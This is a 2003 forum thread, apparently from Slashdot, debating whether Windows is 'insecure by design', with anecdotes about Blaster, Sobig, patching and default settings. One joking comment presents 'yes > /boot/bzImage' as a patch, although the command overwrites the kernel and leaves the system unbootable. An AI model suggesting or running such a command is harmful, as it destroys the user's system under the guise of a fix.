If companies made it a rule to stop using outlook/outlook express, and properly instruct people to never open email attachments from people they don't know, and file extensions that aren't safe (pif, scr, exe) then that alone would stop most viruses in their tracks. But alas, 90% of the office workforce is comprised of mindless drones who barely know how to use outlook in the first place.

Linux needed to help keep Windows secure

[dwheeler]

GNU/Linux systems can be used to help Windows systems get a little more secure.

A family member of mine got a new Windows XP system, installed it, and tried to download the security patches. Before the XP system managed to download the patches, it had already been 0wned by Blaster. It's really hard to keep a Windows system up-to-date when you can't connect to the Internet to update it.

My solution?? I used Red Hat Linux to download the patch, and wrote it on some media. Of course, he can't really completely wipe his hard drive to be sure he's safe from any other attacks. Why? If the drive is fully wiped, Windows XP can't be installed any more - on his system, the CD doesn't contain the entire OS!

Of course, I'm writing this from a Red Hat Linux system that has a nice built-in firewall, a "root" account that's not normally used, no externally-accessible ports, and lots of other designs that make it far more resistant to attack in the first place. Yum.

Re:If you "trademark" your mail addy...

[aussersterne]

I suppose it was more a rhetorical point than a literal one. You are of course right... I am just trying to figure out how to strike a balance between limiting my exposure to liability in this networked world (because everyone is happy to sue these days) and still participating in society in normal ways.

This balance is an increasingly difficult one to find and maintain.

Re:I call bullshit...

[Phil+John]

Yes, but you have to admin that the MSBlaster/LuvSan worm would not have been possible if RPC hadn't been disabled in an OS that doesn't require it, i.e. XP Home, or Internet Connection Firewall was on by default rather than requiring user intervention, when half the users out there don't know what a firewall is, let alone how to turn one on.

Also, Linux users are on the most part more tech savvy than windows users, which I think plays a big part (I bet you 9 out of 10 linux users know not to open every attachment they receive).

Re:Insecure by Design

[Tony-A]

Fact: File extensions are still hidden by default.

Re:Apple and Linux systems are insecure too!

[LostCluster]

Mozilla Mail in fact is subject to a Sobig-style attack, all that's missing is a virus that reads Mozilla's address book and goes. If your business installed Mozilla Mail, it'd still meet the mindless drones who will still open up the pif, scr, and exe attachments.

Hard when there isn't alternatives

[ducomputergeek]

I now work for a small company that sells public access kiosk systems and guess what, there is only one Linux based Kiosk system that we know of. Everything else runs ontop of of Win 2k or XP.

We are switching over to the Linux based system on our "sponsored" tables, however for our pay-per-use system, we have no choice. None of the bill collecters work on the Linux version as of yet. Until then, one some of our terminals, we have no choice.

Security is a problem, because for starters the kiosk program we have will not run on NTFS, only Fat 32 so we have to swap out harddrives with at least 1 terminal out of 10 a week and reghost it because dispite blocking software, people DL things they shouldn't be.

At work, I have a Powerbook and my boss now has a dual boot system with Windows XP pro and RH 9. He's trying to get used to Linux and Openoffice so that we can have all future employees either use Macs (for those needing photoshop/DW) and everyone can do billing and accounting from Linux terminals.

Re:Why was this posted?

these virii were created by people - people create virii for windows because that's what people use, not because it's more insecure than other OS's. When linux gets more popular people will start making virii for it.

Re:It's not Windows' fault

[owlstead]

Because this text is clearly nonsense. None of the protocols you mention have inherent security flaws Maybe you should have noticed ftp instead, which does have some quirks.

RPC has been targeted due to a defunct implementation on MS side, and the fact that it was open to the internet by default. This has nothing to do with security of the protocols an sich.

To make your point completely moot: when MS does develop it's own protocols (SMB, PPTP etc) they are inferior to the standardised protocols concerning security.

One can safely say that the MS record on implementing secure protocols up till now is not that great.

Only the XBox seems to be quite secure. Of all things, a game console is the current MS flagship :)

Warper

article bogus

[felix9x]

The claim of the author is bogus.

The author claims that windows is insecure by "Design" but he fails to talk at all about the actual design of the system. Design goes to the core of system design and I know security was definatly designed into NT from the start unlike Windos9x.

I dont consider buffer overflows to be particularly a design issue but generaly a coding faults. Every OS has had buffer overflows exploits and design can not prevent them unless automatic protection agains them is designed in which most OS's dont implement.

The author should do a bit of research and not write fluffy articles that have no merit!!

Re:article bogus

[tomem]

I took "by design" as a common English useage equivalent to "intentionally". It really doesn't say anything about the OS design.

In the article it points out that MS considered the matter and decided that the OS should be shipped "open" by default to satisfy a number of customers who expressed a preference for that.

If these were expert customers, they should have considered the consequences of their preference being implemented for inexpert customers, who are far more numerous. It's trivial for an experienced sysadmin to open a system, but damn unlikely for a rube to care about how to close it up.

Then there is the matter of software update notices being lost in a blizzard of other annoying notices, which makes it very unlikely that updates will actually be installed by users. That could be seen as obstruction of security "by design", in the sense you take it.

Plug and Pray, or Plug and Pay! Security Optional

[alexander.morgan]

Pegoraro has a point about users not patching their systems, but unfortunately I can understand why: the updates are causing huge problems.

On one of my desktop systems, the latest Windows XP driver updates trashed my Hercules Game Theater XP setup. Lots of error messages and no sound!

On my Laptop, the latest Windows 2000 service pack blew away support for the Netgear MA401 WiFi card.

The first problem is easily dealt with. Roll back the upgrade. Sound worked before and it wasn't a critical update--just recommended.

For the laptop, I now have a choice between gaping security holes or WiFi support. Thankfully it dual boots to Linux ;)

I wonder how many people are in the same boat. Plug and pray, or plug and pay!

I've got worries anyway...

[casuist99]

I run probably the only Linux machine on a residential LAN with a shared internet gateway. Since last week sometime, the virus has so infested the XP/2000 machines on the LAN that all my upstream requests are dreadfully slow. DNS queries and HTTP GET requests, etc. Downstream transfer speeds are just fine. This is the curse of the Slammer virus - 10 to 15 port scans per second per machine on a largely M$ LAN leads to practically no internet access. The sorts of users who refuse to update their machines even weeks after a virus advisory is issued are the bane of their LAN neighbors. How can you just not care that your machine is randomly shutting down with 60-second warnings?!?!
So, Linux helps, but only in as much as I myself cannot become infected.
Hopefully this will post...

Re:Nice to see such a mainstream source getting on

The question is, do they really care more about the customer or the bottom line?

The bottom line, obviously.

I rememeber reading an article in Dr. Dobbs about a great piece of file indexing code that Microsoft wrote.. it was a great system, bounded resource use, bounded worst-case performance, a nice piece of CS. By the end of the article I learned that it was written TEN YEARS ago and Microsoft sat on it because they didn't need it from a marketing point of view.

That made me think about how Microsoft operates. They just give out enough to keep customers from leaving. Not one ounce more. That's why Windows is a crappy OS (captive audience, everybody has it on their PC) but the desktop programs are a little higher quality (there is some competition, however tiny).

Another example: C# is a completely open language, not because MS is generous, but because it's a selling point over Java.

MS is calculating and ruthless. You'll get security from Microsoft when it starts to be a problem for the bottom line. Not a day sooner.

And judging by my friends and co-workers nonplussed reactions to these worms/viruses, that day is a long day off...

author confuses poor design with user error

[geekee]

Sure Windows has bugs that lend themselves to security problems. But nowheere in the article does he prove that Windows is more insecure than Linux or MacOS. All he can claim is that the default settings on Windows aren't the best choices for security, and that Red Hat and MacOS do a better job. I'd call relying on default settings user error, not a problem with the Windows code itself. You might as well say Solaris is insecure by design since (with Solaris 8 anyway), the default install runs sendmail, allowing spam relaying and leaves the telnet and ftp ports open, which can result in stolen passwords.

Re:author confuses poor design with user error

[andrewski]

Users want to use computers, not administer them.

You know, I told the police the same thing the other day. I said "Officer, I don't want to understand gun safety, I just want to shoot things!"

Maybe this latest round of viruses makes my point for me - using and understanding (or learning about) computers must go hand-in-hand.

Users are forced to run as admin

[hirschma]

Users running NT based versions of Windows are effectively forced, or annoyed, into running as admin. This happens for a number of reasons:

* Old software runs as admin only. Stuff that came out during the DOS/Windows days, much of it pretty recent, simply won't run as anything but admin. This is a nasty legacy thing, and is a vestige of the horrendous design of Win95/98/ME.

* Too much new software runs as admin. For example, if you want to run Microsoft's own Age of Empires, it only installs as admin, and only runs as admin. This is a new application made by the mothership, and clearly, fits into the home scenario as the article. I'd guess that at least 20% of the apps on my Win2k box require admin rights.

* Too many housekeeping functions require admin.

* It is a relative hassle to run a program with admin rights when not admin. The most common way is to -right click on the program's icon, and then select Run As, and then enter the admin password. Ugh.

* Even for the disciplined, quick user switching allows admin to stay logged in, most likely still running OE or some other security nightmare.

The upshot is that if a user even understands the concept of not running as admin, they are forced to, or get lazy and do so.

I've set up several users on Win2k, and taught them about security, and why they really, really don't want to run as admin. Months later, they all are.

This will be a problem if Linux ever becomes widely adopted by home users, and why Lindows runs as root by default.

Didn't Apple get this figured out? Why haven't everyone else copy them as usual?

Jonathan

OS X is completely locked up...

[cfoster611]

In comparison, Mac OS X ships with zero ports open to the Internet.

Actually, OS X does have (in most systems) some ports/services open by default. Here's a sample portscan with no user-services (ssh,httpd, afp, etc) running.

Port Scan has started ...

Port Scanning host: 127.0.0.1

Open Port: 427
Open Port: 631
Open Port: 1033

1033 is assigned to NetInfo
427 is "server locator"
631 is "IPP (Internet Printing Protocol)" ...according to the iana.

Re:If you "trademark" your mail addy...

[Geek+of+Tech]

I am just trying to figure out how to strike a balance between limiting my exposure to liability in this networked world (because everyone is happy to sue these days) and still participating in society in normal ways.

Uh, hate to tell you, but unless you're sueing somebody you're not participating in society in normal ways.

Installing Linux - Insecure out of the box-

[purduephotog]

A few years ago there were a few rants because Linux (redhat) wasn't secure out of the box. It shipped with a few packages that had a few exploits- yet the fault fell on the user for not updating their package.
My grandmother hasn't updated anything on her computer- she's 81 and more concerned with knitting and talking to her grandchildren. I just walked her thru an update.
Can you imagine if I had to tell her how to do that on linux ?? (without a subscription mind you) - Yeah grandma, type wget -? ...

Windows Update did- and worked- and fixed it. But it's easier to bash MS for the people whom didn't patch their systems in a timely manner than to target the blame where it ought to be.
In the past 3 years, since my Grandmother got her computer, how many new Redhat versions have rolled out? How many of those versions would seamlessly install over the other one? I believe the answer is 3 versions and none, Bob.
Lay off the MS bashing- most of my software I have to use is closed source and several $K per seat- I'm not going to stop using MS until.... well, never. If they move to a different system then I move. I'm tied to the company that writes the code I need to do my job, as are many people in the engineering fields. Leverage one, move the other.

Re: Windows Is 'Insecure By Design,' ...

[Little+Brother]

I wonder how many people skip the patches because the EULA's are so obnoxious?

I wonder how many people read the EULA's? I bet the numbers are related (and small).

Re:Nice to see such a mainstream source getting on

[smallpaul]

So a friend asks me today to help them install XP. I was reluctant but XP does have some legitimate advantages over Windows 98 and her Windows 98 was crashing. The disk she hands me from the computer store is from 2001. Okay, I'll have to download some patches, I think. She's a modem user. Little did I understand (as a naive Mac/Unix user) that in the time it takes to connect to the Microsoft site I was already infected by TWO virii. Egad! So I downloaded a disinfector and then initalized the firewall. Now I go to see whta it takes to download the patches and update. According to Windows Update, she needs *40* security patches and critical updates...totally over 40MB. Over her freaking dialup modem!

Okay, maybe I should have turned on the firewall before connecting to the Intenet. I didn't realize the virii were scanning so relentlessly and quickly. I also thought that the idea of turning on a software firewall on a brand-new install seems a little dumb. All the firewall does is prevent incoming connections to insecure ports. If Microsoft knew when they shipped the OS that the ports would likely be found insecure, why wouldn't they just turn them off by default? I mean it is one thing to buy Norton Firewall on the presumption that they are fixing Microsoft's broken security model but why would I use a "security fix" that comes on the same CD as the program that introduced the security hole in the first place! It seems totally illogical to me.

New sig file...

[MasonMcD]

I now have a new signature on my emails:

*In light of the ability of some email viruses (eg SoBig.F) to spoof this address regardless of whether my machine is infected or not (for instance, pulling my address from a Windows user address book to use as a fake return address), if this statement is not included, consider a message from me to be a virus*

I figure that will be good, going out a few dozen times a day. I urge everyone to pen something similar. Cause, ya know, MS can never have too much bad press... erm, room to innovate.

Re:New sig file...

[E_elven]

Of course, the next big trojan (it's supposedly to be called DamnTiny.Bill) will include something like that.

From: BillG@ms.org
Subject: I hate you, b1tch!
Text:
It was joke. Ahaha.
Take a look at this. Finest Klatchian
waterbeetle clock, it's really quite
humorous.

*****
ALL MY EMAIL IS FOLLOWED BY THIS NOTICE.
IF IT IS NOT PRESENT, BE AWARE THE MAIL
IS NOT FROM ME AND MAY BE A VIRUS!
*****

Attachment: fkwbc34.vbs

Re:New sig file...

[dspeyer]

They beat you to it (sorta), Sobig.F contains the line

X-MailScanner: Found to be clean

Not sure what it achieves, but it's there.

Re:Insecure by Design

[BRTB]

Also fact: System relies on file extensions to differentiate between executable and non-executable files, which in my mind is a bit worse.

Re:MOD PARENT UP, more..

[Flower]

MS chose to enable features as default that did not need to be on most installs. That is an insecure design. To be fair, earlier versions of RH did the same stupid thing and got burned by it. Macs also used to suffer from worms though I don't know why things got better - sorry used to keep up with Macs but not anymore.

Anyway, as for your requirement for "INTENT." Back when the CodeRed came out, work gave me the responsibility of locking down our IIS servers. Back then I didn't have any experience with IIS so I did the smartest thing I could come up with - started reading and convinced work to send me to a one day SANS seminar. Well, the instructor told a story from an MS employee of how MS figured it was cheaper enable crap like Internet Printing and the like by default than it was to eat the cost of projected support calls they would get from people who wanted the feature but couldn't figure out how to enable it.

IOW, enabling everything in IIS was done because it saved MS a few bucks. That is a design decision. It was intentional and most importantly it was insecure.

You still want to mince words on this?

Worse: insecure ON PURPOSE to allow macros etc

[Doug+Merritt]

Windows is flawed because it wasn't designed to be secure from the beginning

True, but far worse: Microsoft quite intentionally continues to make Windows and Office etc insecure on PURPOSE, as a side effect of offering full programmability of email, Excel, etc.

There wouldn't be any email viruses nor spreadsheet viruses nor Word document viruses if these apps were lobotomized -- if they could not be programmed.

But Microsoft continually makes the business decision that adding the power of programmability to every app is much more important than the resulting insecurity.

The vast majority of Linux apps do not allow that kind of programmability -- even when extension languages like Guile/elisp/etc are available in Unix apps, programs aren't automatically and blindly run whenever some hapless user receives email or views a spreadsheet or whatever.

Conversely, whenever that kind of programmability is added to Unix apps, if it is triggerable just by receiving/viewing a file, then Unix viruses will become far more rampant. (A small saving grace is that the Unix viruses mostly, but not always, will run as some user rather than as root, but this is really only a small issue.)

This should be a wake-up call to teams like Gnumeric; just yesterday on Slashdot Gnumeric was criticized for not supporting every single MS Excel feature, and Jody Goldberg replied that hopefully it would include those by next year. But any Unix app that is 100% compatible with a MS app will be virus prone!

Quote from a poster on that story:

Worksheet functions are great, but a lot of Excel's draw comes from its embedded VBA. Companies that rely on workbooks with embedded VBA probably wont be willing to switch to Gnumeric until it has support for VBA, or something very similar.

Mmm-hmm, and there goes security.

(Story link: Gnumeric Now Supports All Excel Worksheet Functions )

The really sad thing is that the marketplace clearly agrees with Microsoft about this tradeoff: corporate and personal users are far more concerned with having the power of macros/Visual Basic/etc built in to everything than with even basic security.

If IE / Outlook ran in their own account....

[tjstork]

With write priviledges only to their own sandbox, then, none of this would be happening. Instead, you've got IE and Outlook running as a user's account, so, despite the prevalance of a workable user based access control list based security system in Windows, Microsoft does not use it where it really counts. Dumb dumb dumb.

Hey....

[Theatetus]

All I got was weird colors on my screen...

But my friend said to patch it by doing

yes > /boot/bzImage

Sure hope that works....

The main problem with windows is the users..

[Ramion]

Today I sat down at my computer when I got a MSN message from a friend. That friend is complete noob with computers and now he had a problem.

This is pretty much what was said:
Friend: Hey. I got a problem with my computer. It has shut itself two times today, without me doing something. What do you think is wrong? I heard something about a virus.

Me: Yeah there is a few major virus's flowing around the net right now. Have you patched your system?

Friend: Patched ? ?

Me: Yeah. You know downloaded updates for windows.

Friend: No..

Me: Oh well. Here is a link to a virus scanner try and run that first. .... After awhile, me trying to explain him how to scan for viruses. Yeah! It found a virus named blaster and I THINK he got it removed...

Me: Good now to update your system. .... I, after awhile, get him pointed to the windows update and the patch for blaster. Again I think he got it installed ....

Me: So, Now I suggest you update your system with patches from windows update.

Friend: Why? What should I waste time download all that? What good does it do me ?

Me: Well... It secures your system, give you updates to windows programs and IE and new drivers. You know. Makes it upto date.

Friend: But how do I do it ? .... I try to explain him how to use windowsupdate but is almost giving up since he just dont get he just gotta press scan for updates and then install updates. Well in the end he gives up and says he dont care ....

And there is the entire windows Security problem. Users that just come to their computer to surf abit and download a few programs like kazaa or emule just dont feel the need for updates. And they end up spreding the viruses to the entire net. Oh.. And it dont help that MS dont allow pirate versions of windows to be updated fully. I can see why it would in sense suck for them to give free updates to people that havent payed for the system. But people dont get updates when its all blocked. Which in end leads to viruses like this to run wild.

Another example of Windows' designed insecurity

[xigxag]

Outlook Express 6 SP1 now comes with a setting to "read all messages in plain text" Which is how I have my system configured and which gets rid of approximately 100% of email viruses. But unless you happen to be fiddling around with the configuration of OE, you'd never know this setting exists. If anything, Microsoft should be prominently advertising this "new, free" feature (which is of course ain't new, it's elm-level functionality) as a way to protect your system, but they won't.

Sure, but most people like their email with pretty colors. Then, fine, they should do what Poco Mail does, automatically "sanitize" email by stripping potentially harmful HTML coding and external image downloading (i.e. webbugs) while allowing basic HTML formatting to be read. This is not rocket science, but MS seems to be irresponsibly holding back on such basic safety improvements.

Re:Another example of Windows' designed insecurity

[Ravenseye]

And that's about as basic as it gets. E-mail is text. Anything else is un-necessary. Why people just HAVE to use lazy-HTML is completely beyond me. People should use Pegasus or some other compliant mailer...at least to keep life sane for those of us who otherwise give a damn.

Attachments = risk is not 'common sense'

[lpontiac]

From the article:

Not opening strange e-mail attachments helps to keep Windows secure (not to mention it's plain common sense), but it isn't enough.

I use mutt to read most of my mail (years ago, I used pine.) Opening strange attachments isn't an issue for me, and shouldn't be for anyone else. If there is executable code in an attachment .. my client will show me executable code, it sure as hell won't run it. That's common sense.

long week for windows users is right.

[htmlboy]

it's dorm move-in weekend at the university where i work. after looking at a sample of the machines brought to school by students given the privilege of early move-in (ra's, mainly), we found that less than 5% of our students were patched for both blaster/lovesan and welchia/naichi. as such, it was decided that shutting off the entire residence hall network would be easier than shutting off ~95% of the ports once they got infected (typically takes 3-5 seconds in this environment). so our student workers and a few full-timers like me get to make our way to every single student machine (~8,000 students in the dorms) and analyze, clean, patch, and install a current virus scanner.

overtime is great.

No problems here.

[AllDigital]

First off, let me say that I KNOW that Linux and BSD are a lot more stable than Windows...but in the real world...where family and associates need to be spoon fed, Windows is what is in use. I have had absolutely no problems with any of the recent outbreaks. BECAUSE, I ensure that the computers under my care are current with updates (afer I evaluate them) and that firewalls are properly configured.....and yes, I even talk to the users and ensure that they know that the is some new bad thing out there. Nothing personal, but do not whine about Windows if the real problem is that you expect your users to take care of everything themselves. I don't expect them to, and I am happy to help them without making them feel stupid. That is why I am still employed and happy at my job.

Laggy bundles

At least the version of XP provided to PC manufacturers is refreshed once a quarter or so -- and Microsoft says it's working to shorten this lag.

Why does that lag exist at all? I realise Microsoft has built its fortune by masquerading software as a tangible good, but we're talking like one CD to each vendor. They're just copying an install onto hard drives and pushing them out the door, so why aren't they kept up-to-date? Couple the in-factory lag with that on already-boxed inventory and the OS that first boots up can be ages-old - and it's probably already attached to a hostile wire.

Just listen please....

[Genjurosan]

Your reply is the best so far; however, just take a step back and listen to my point.

Do you think we should write an article that claims that Henry Ford invented the automobile as a device to kill people 'by design'?

People get in vehicles drunk and run into families of four, killing them all. Do you think that this unintentional side effect was, 'by design' when the engineers created the vehicle? Was it 'by design' when man created beer or wine?

I think I'm being treated VERY unfairly by most responses here.

I give you one more example.

When the hammer was designed, do you think the designer intended it to be used to kill people? Or how about the baseball bat?

This is being over-analyzed by so many techies, that I think the clear facts are being missed. That which is, the article is misleading and doesn't contain a fair wording of facts. Put yourself in the shoes of others. Take a breath and look at my point.

Re:Just listen please....

[1010011010]

Do you think we should write an article that claims that Henry Ford invented the automobile as a device to kill people 'by design'?

No, that would be the same as saying "Operating systems are insecure by design." What the article says is, "Windows is insecure by design." This is like saying "the Suzuki Samurai is unsafe by design." Damned thing tips over way too easy.

Here's an example I posted elsewhere about Windows being "insecure by design":

Well, he could have mentioned a true "Insecure by Design" flaw in Windows: the fact that Windows determines that a file is executable based on its *name*. If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

On Unix and unix-like systems, one has to explicitly mark a file as executable before ths OS will try to run it, and it's even possible to deny the "execute" permission to an entire filesystem (for instance, users' read-write home directories).

the article is misleading

Not really.

Re:Just listen please....

[Genjurosan]

No, that would be the same as saying "Operating systems are insecure by design." What the article says is, "Windows is insecure by design." This is like saying "the Suzuki Samurai is unsafe by design." Damned thing tips over way too easy. So this leads me back to perspectives and how we understand language.

If the Suzuki Samurai is unsafe because it tips over too easy, I would write it as:

"The Suzuki Samurai is unsafe because of the way it was designed."

Not,

"The Suzuki Samurai is unsafe by design."

Too me, The first method indicates that the design carries with it a low value of safety. The second indicates that there was intent to design the Samurai as an unsafe vehicle.

Semantics again...

Another response to that silly argument.

[Alethes]

If Windows is attacked because it's popular, then why isn't Apache spreading more worms than IIS since it has 60% of the webserver market?

Re:Market Share?

[0x0d0a]

You want QA on your kernels done by a QA team, you go to a distro vendor. The kernel was released by Linus, not by any vendors. That's the rough equivalent of doing a beta release.

Search for IIS on SecurityFocus's vulnerability database if you want a list of IIS holes. There are many.

Conspiracy theory

[bokmann]

I'm late to the party with this reply, but I'm posting it anyway for posterity. Someday I'll find this message and link back to it.

Windows IS insecure by design. The Virii and worms that are happening now are pissing people off. In the future, Microsoft will bring the 'security' scheme from the XBox to Windows... code will have to be signed by Microsoft in order to run on Windows. the press will love it, and you will see tons of articles saying things like "Microsoft gets Security Right" and "Microsoft Announces the End of Virii".

And in the end, you and I won't be allowed to fire up a compiler and write a trivial little 'Hello World' program without buying a runtime license from Microsoft, which will be embeded in every program you write.

Innovation will be stifled... I doubt Microsoft will be very license-friendly to Sun, or Apache, or Cygwin, etc.

Microsoft's own lax security is a plan to pave the way to their heavy handed takeover of your computer.

mark my words.

Re:Conspiracy theory

[toddestan]

Even if they bring a security level like that to the PC, do you think that they won't manage to somehow screw it up to the point where there will be dozens of exploits that people can use to make the machine run any code they want?

I mean, take a look at the X-box. Microsoft controls both the hardware and the software, and people have managed to run anything they want on unmodified X-Boxes.

Re:Conspiracy theory

[westyvw]

People ought to Mod this up. To the TOP. You are right, at least in the sense that MS wants you to use apps over the internet, paying for each useage. They also want you to store the files remotely, on thier servers. What better way to be secure and protect their intellectual development.

What people dont realize, is that this IS SPELLED out CLEARLY (yeah I am yelling) in their internal documents, and is the future they want. I have read articles about this many times. You may be off a little by suggesting that the will use a security trump card, but I wouldnt bet you are far off. This is the future if we (well not me, this message comes from a comp using Suse Linux) continue to use MS products.

In other news...

[swtaarrs]

It has been recently discovered that the Pope is Catholic. Who knew?!

Perhaps I'm doing something wrong...

[ScottGant]

I'm not an XP lover, but it's the OS that's on my computer. It just is. I play games and run Photoshop and other programs...so I use XP because my favorite programs all run on this OS on fairly cheap hardware.

Now, I may be doing something wrong here, but I've NEVER had a virus. I've never had a problem with a worm or anything really. XP hasn't even crashed on me before....ever. I've had programs hang up or crash...but the OS itself hasn't crashed.

And this has been the same on the 2 different machines that I've run XP on.

But yet, I always hear about everyone raking XP and Windows across the coals all the time. Yet I've never ever experienced nor do I know anyone anyone that's ever had major problems with XP. Oh, I know people out there have problems...but it's just that I personally have never known any.

Why is that? Now, as I said, I'm not an XP zealot at all. I could take it or leave it. But after reading here on Slashdot the evils of Windows and XP it would seem that my machine should have burst into flames months ago, yet it's going on day after day, never turned off, always hooked to the net...and chugging right along.

And I'm not really doing anything special. I keep up with all the updates to XP...which takes about 2 minutes out of my week. And I have basic Norton Antivirus running. I have Seti@home running when I'm away from the machine and I do a disk clean up and defragment maybe once a month or so.

So again, I must be doing something wrong (or right) to where XP doesn't give me one iota of problem.

I'm not praising XP...at least I don't mean to be praising it. You only see people bashing Windows, never praising it. To praise it would mean being thrown out of geekdom. So I think if XP or NT is working for you, you keep your mouth shut or just talk about how great Linux is.

I guess your mileage may vary.

Re:Perhaps I'm doing something wrong...

[naelurec]

Its all a matter of perspective. It seems like Windows NT/2k/XP works pretty good for knowledgable end users (Which you seem to be one ...). I have a W2K box that as a box works pretty good at what it does (though it does have some rather strange memory related problems .. but not nasty enough to justify a re-install...) However, atleast for me, after running Linux, Mac OS X and now FreeBSD as my primary desktop, I have a different perspective on how an operating system should work. I actually find the *nix desktops to be easier to work with. Not only are there a lot more cool features (ie mozilla has lots of neat features over Internet Explorer, same with KDE vs Explorer, etc..) but the entire system seems laid out much more logical. When programs install on my FreeBSD box, I know exactly what files it has installed and where (not to mention it is really easy to remove ALL the related files compared to the add/remove feature in Windows). I can quickly find what applications are running, I have a lot more information available to me as far as what is going on "under the hood" and most importantly, I can access all critical features on a fast SSH connection instead of trying VNC or some other cumbersome GUI interface. So whats my point? Well I suppose when my Windows using buddies, relatives and customers call me with yet_another_windows_problem (sobig, blaster, other viruses, adware, whatever..) I tend to think that "well if they were running *nix, would they have this problem? (usually not)" and "if they were running *nix, I could simply SSH to their box and fix the problem in a few minutes instead of explaining how to setup VNC over the phone and trying to troubleshoot it remotely (with their side being a 28.8k dial up connection)) or hopping in my car and physically sitting in front of the computer and hacking away at it.. Whats my point? I dunno. I guess I have found the *nix systems to be generally better than the Microsoft offerings. Since using *nix, I have different expectations to how my computer should work and at this time, Microsoft does not meet these expectations. Infact, when I am using Windows boxes, I have found that I get frusterated with the machine because it doesn't work like I am use to.

Re:Perhaps I'm doing something wrong...

[westlake]

The msblast worm seems to have been for most folks a non-event.

The Symantic W32.Blaster.Worm Removal Tool has been downloaded about 131,000 times through Download.com, which is probably a fair measure of the scale of the infection.

---but, in comparison, Kazaa was downloaded 2,678,000 times last week alone.

To break into Download.com's top fifty lists, a Windows program must approach 30,000 downloads a week, to make the Mac list, a bare---some would say pathetic--- eight hundred.

The simplest conclusion to be drawn from such numbers is that it is difficult for even the most aggressive worm or virus to bring down more than the tiniest fraction of the installed Windows base.

---not because Windows systems are "inherently secure," but because the Windows user base is so immense an infection can be contained before it becomes unmanageable, or even visible to users, for anyone who auto-magically installed the RPC patch on July 16th, the hoo-rah after must have come as quite a surprise.

Re:It's not Windows' fault

[hankaholic]

In a response to a recent story, someone mentioned that UNIX standards were generally based upon specifications which had been made publically available for comment.

This is something that many take for granted, but it is quite important. RFCs are discussed publicly, and people review protocols independently of specific implementations. This means that the protocols themselves are refined, and implementors only have to worry about correctly coding to a given specification.

Under Windows, the specification is often "whatever works with this code is fine". This invites much less review of the protocols, and since the protocols are ill-defined, it's difficult to determine whether the protocol has been implemented correctly.

Redist versions of Windows patches

[yerricde]

Windows patches come in both a Windows Update version (downloaded through an ActiveX control through windowsupdate.microsoft.com) and a "redist" version (downloaded through any graphical web browser).

What...?

[EdMcMan]

I love Microsoft bashing as much as the next Linux user, but this article doesn't make much sense. Linux machines are targetted very often in security issues. If you have an unsecured Linux machine on the internet, it will either succomb to a worm, or be hacked by script kiddies. Most admins don't even usually notice script kiddie hacks (think monitoring thousands of servers..). Yes, Windows is insecure by design. So is Linux. So is *gasp* OpenBSD. Software written by humans is insecure by design.

Re:JRTFA

[abirdman]

Right on. My experience was the same. I was immunized from BLASTER on July 17th according to the log from MS Update. It's very hip and au courant to ignore MS Updates, because they're a pain, and their Service Packs don't have a great reputation. But updating early and often has kept me out of trouble.

When I started getting Sobig emails on Tuesday, I even took the time to call two of my friends (who subscribe to some of the same lists I do) to warn them not to trust emails with attachments. I had to explain the whole concept to them, but they got it. I got 40 the first day, 20 the second and only a handful since. And I had no desire to open any of them.

The biggest threat that Windows poses is that from users who are totally clueless... they turn on their machine thinking it's some kind of "email machine" and nothing else. Not a clue there are threats or risks out there. And no indication from Windows, or Outlook, or IE that anything they do could be unsafe. Windows update works, at least this time it did. They're not going to get more saavy, so there's no harm in telling people to use windows update.

Tell your friends:
1. Don't preview email
2. Delete email you don't know or trust
3. Don't open attachments if they're not absolutely known and expected
3. Update early and often

The article is right, Windows is dangerous. MS isn't going to tell the consumer, because that would threaten their (considerable) cash flow.

I'll shut up now.

Re:I have a coworker who kept saying it was hardwa

[AJWM]

Agreed that developers aren't IT support (well, unless they're developing apps for IT). But they ought to know how to keep their desktops running.

Heck, I used to develop in a shop where any developer above "junior programmer" was expected to know how to reinstall the OS (Solaris, Ultrix or AIX), configure it for Oracle, install Oracle, install our software (a GIS system), and generally manage their own workstations. Ditto for the sales support guys'n'gals and the trainers (although the latter might need some phone support).

Would you have automotive engineers or even car salesmen that don't know how to drive, check the oil and put gas in the car?

Re:Don't worry...

[ceejayoz]

Never got a single virus in five years of using Outlook - I only just recently moved to Mozilla Thunderbird for the spam filtering.

Honestly, any user with an ounce of common sense can use Outlook perfectly safely. That e-mail with the pidgin English and the .vbs attachment? Don't run the attachment! Simple enough...

NSA Secure Linux going into the standard kernel

[Animats]

On August 13, 2003, with little publicity, the NSA Secure Linux was merged into the mainline Linux kernel. It's in 2.6.0-test3 and later kernels. There's also useful documentation at the sysadmin level, and the beginnings of a multilevel secure X-windows system.

It's not a magic bullet, but mandatory security just went mainstream.

What this all means is the ability to put programs into levels and compartments from which they can't escape. Security breaches in the mail handler or the web server can't propagate to the rest of the system.

The code is open source, GPL, and written by the United States Department of Defense's National Security Agency. It looks like Microsoft's attempt to shut down that project failed.

In other news...

[MegaFur]

Windows Is 'Insecure By Design,' Says Washington Post

In other news, really, really smart scientists that spent a lot of grant money determined that: living people breath (air), fish generally live in water, Battlefield Earth was a mindwitheringly bad movie, and cutting down a tree with a herring is inherently impractical.

Windows Insecure By Design? a world of ***!!DUH!!*** It's nice to see the general public starting to wake up to this fact. Expect to see the standard ports (135, 445, etc) closed when Longhorn comes out... maybe And even then, I doubt MS will make any other changes. Or, if they do, they'll open up five or six more ports in the process. :-P Not that I'm bitter... oh no.

Let's never forget the conversation between a fictional Steve Jobs and Bill Gates in "Pirates of Silicon Valley":
fictional Steve Jobs: We're better than you are. We have better stuff.
fictional Bill Gates: You don't get it, Steve--that doesn't matter!

Dorms the breeding grounds??

[pair-a-noyd]

I just took my son to college this weekend and set his pc up for him. (Ah yes, dad knows FAR more about computers that jr...)

We dropped his stuff off in his dorm and discovering there was only one ethernet jack in his room we left for Best Buy to grab a cheapy hub so he could plug his LINUX box, his PS/2 and his roommate all into the single lan jack.

Well, we blew off the hub because his roommate called his cell phone and said he was "bringing a *thing* from home to hook both of *them* up at once"..

So, assuming he was talking about a hub we blew that off. Well, we got back and discover the roomy had plugged a cordless phone into the lan jack. I pulled the cord and announced that they were lucky system security didn't come up and billy club someone for crashing planet earth into the mooon by plugging the phone into the lan jack. The roomy was sitting there looking like he had crapped his pants.

I plugged my son's pc into the lan and fired it up to make sure it was configured properly with the college system and it was fine.

My son is using Mandrake 9.1 w/KDE 3.1.3tex.

Now, when you fire up Linux *MOST* people are going to say something, it's different you know and if a NORMAL person has a few brain cells functioning, they will notice something is different and not only ask questions but come over to watch..

